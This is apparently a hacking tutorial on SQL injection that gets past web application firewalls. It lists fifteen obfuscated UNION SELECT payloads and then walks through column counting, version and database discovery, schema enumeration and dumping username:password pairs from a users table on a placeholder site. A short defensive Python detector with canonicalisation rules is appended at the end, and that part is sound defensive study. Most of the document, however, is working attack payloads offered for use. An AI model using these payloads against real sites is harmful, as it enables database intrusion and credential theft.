WD

waf bypass

SQL injection bypassing WAF (forbidden)

1. id=1+(UnIoN)+(SelECT)+
2. id=1+(UnIoN+SeLeCT)+
3. id=1+(UnI)(oN)+(SeL)(EcT)
4. id=1+'UnI''On'+'SeL''ECT'
5. id=1+%55nion all /*!12345%53elect*/ 1,version(),3--
6. id=1+UnIoN+SeLecT 1,2,3--
7. id=1+UnIOn/**/SeLect 1,2,3--
8. id=1+UNIunionON+SELselectECT 1,2,3--
9. id=1+/*!UnIOn*/+/*!sElEcT*/ 1,2,3--
10. id=1 and (select 1)=(Select 0xAA 1000 more A’s)+UnIoN+SeLeCT 1,2,3--
11. id=1+%23sexsexsex%0aUnIOn%23sexsexsex%0aSeLecT+1,2,3--
12. id=1+un/**/ion+sel/**/ect+1,2,3--
13. id=1+/**//*U*//*n*//*I*//*o*//*N*//*S*//*e*//*L*//*e*//*c*//*T*/1,2,3
14. id=1+/**/union/*&id=*/select/*&id=*/column/*&id=*/from/*&id=*/table--
15. id=1+/**/union/*&id=*/select/*&id=*/1,2,3--

www.site.com/id?=4'


www.site.com/id?=4 order by 1-- error
www.site.com/id?=4 order by 1--+ error  :/
www.site.com/id?=4 order by 1-- - error :/
www.site.com/id?=4 Group by 1-- - no error  :D
www.site.com/id?=4 Group by 2-- no error
www.site.com/id?=4 Group by 3-- no error
www.site.com/id?=4 Group by 4-- no error
www.site.com/id?=4 Group by 5-- no error
www.site.com/id?=4 Group by 6-- no error
www.site.com/id?=4 Group by 7-- no error
www.site.com/id?=4 Group by 8-- error
-----------------------------------------------------------------------------------------------------------------
Part 2
www.site.com/id?=-4 union select 1,2,3,4,5,6,7--
If you see 403 (Forbidden), the WAF is blocking the request and we have to bypass it.

Let's try a WAF bypass.

www.site.com/id?=-4 union select 1,2,3,4,5,6,7--+ error
www.site.com/id?=-4 union select 1,2,3,4,5,6,7--+- error
www.site.com/id?=-4 union select 1,2,3,4,5,6,7-- - error
( -- - ) is the one that works most often.

www.site.com/id?=-4 /*!50000union*/+/*!50000select*/ 1,2,3,4,5,6,7-- -

www.site.com/id?=-4 /*!50000union*/+/*!50000select*/ 1,version(),3,4,5,6,7-- -

another way

www.site.com/id?=-4 /*!50000union*/+/*!50000select*/ 1,@@version,3,4,5,6,7-- -
-------------------------------------
for database name
-------------------------------------
www.site.com/id?=-4 /*!50000union*/+/*!50000select*/ 1,@@database,3,4,5,6,7-- -
www.site.com/id?=-4 /*!50000union*/+/*!50000select*/ 1,database(),3,4,5,6,7-- -
----------------------------------------------------------------------------------------------------------------------------
Part 3
www.site.com/id?=-4 /*!50000union*/+/*!50000select*/ 1,group_concat(table_name),3,4,5,6,7 from information_schema.tables where table_schema=database()-- - error :/ :/ :/

Now we will bypass this :)

www.site.com/id?=-4 /*!50000union*/+/*!50000select*/ 1,/*!table_name*/,3,4,5,6,7+from /*!information_schema*/./*!tables*/ where table_schema=database()-- - :D :D :D

we got database :D :D :D

www.site.com/id?=-4 /*!50000union*/+/*!50000select*/ 1,unhex(hex(column_name)),3,4,5,6,7+from /*!information_schema*/.columns where table_name='users'--


another way

The table name has to be converted to CHAR() using HackBar (a plugin for Firefox).

.......table_name=CHAR(117, 115, 101, 114, 115)-- -
If that still does not work, there are many other commands, etc.

unhex(hex(/*!00000concat*/(user,0x3a,pass)))

 /*!00000from*/ users-- -

----------------------------------------------------------------------------------------------------------------------------------------------------------
Part 4

www.site.com/id?=-4 /*!00000UnION*/ SeLeCt 1,unhex(hex(/*!00000concat*/(username,0x3a,password))),3,4,5,6,7 /*!00000from*/ users-- -
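
Seen from the defending side, the comment, case and encoding variants above get through because the filter matches the raw request text. The following is an added example, not part of the original post: a detection routine that decodes and canonicalises the parameter before matching. The rule names, function names and sample values are assumptions constructed for illustration.

```python
import re
from urllib.parse import unquote_plus

VERSIONED = re.compile(r"/\*!\d*(.*?)\*/", re.S)  # /*!50000union*/: MySQL executes the body
BLOCK = re.compile(r"/\*.*?\*/", re.S)            # /**/ and other inline comments
HASH = re.compile(r"#[^\n]*")                     # %23...%0a: '#' comment up to the newline

RULES = {  # hypothetical rule names, matched against canonical lower-case text
    "union-select": re.compile(r"\bunion\b(?:\s+all)?\s+select\b"),
    "schema-enum": re.compile(r"\binformation_schema\b"),
    "column-count-probe": re.compile(r"\b(?:order|group)\s+by\s+\d+"),
}

def naive(raw):
    """Substring check on the raw value: the kind of filter these forms get past."""
    return "union select" in raw.lower()

def canonical_forms(raw):
    """Decode the value, then return it with comments as whitespace and with comments deleted."""
    s = unquote_plus(raw)              # %55nion -> Union, '+' -> space
    s = VERSIONED.sub(r" \1 ", s)      # keep the executable body of versioned comments
    s = HASH.sub(" ", s)
    forms = (BLOCK.sub(" ", s), BLOCK.sub("", s))
    return [" ".join(f.lower().split()) for f in forms]

def detect(raw):
    """Return the sorted names of the rules that match either canonical form."""
    forms = canonical_forms(raw)
    return sorted(n for n, rx in RULES.items() if any(rx.search(f) for f in forms))

# Constructed values of the id parameter, modelled on the forms listed on this page.
SAMPLES = [
    "4",
    "4 Group by 8--",
    "1+UnIOn/**/SeLect 1,2,3--",
    "1+un/**/ion+sel/**/ect+1,2,3--",
    "1+%55nion all /*!12345%53elect*/ 1,version(),3--",
    "1+%23aaa%0aUnIOn%23aaa%0aSeLecT+1,2,3--",
    "-4 /*!50000union*/+/*!50000select*/ 1,/*!table_name*/,3+from /*!information_schema*/./*!tables*/-- -",
]

if __name__ == "__main__":
    for value in SAMPLES:
        print(f"naive={naive(value)!s:5} rules={detect(value)} <- {value}")
```

Both canonical forms are checked because MySQL reads an inline comment as whitespace, while a filter that deletes comments turns un/**/ion back into union. Signature matching remains a secondary control; parameterised queries remove the injection point itself.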
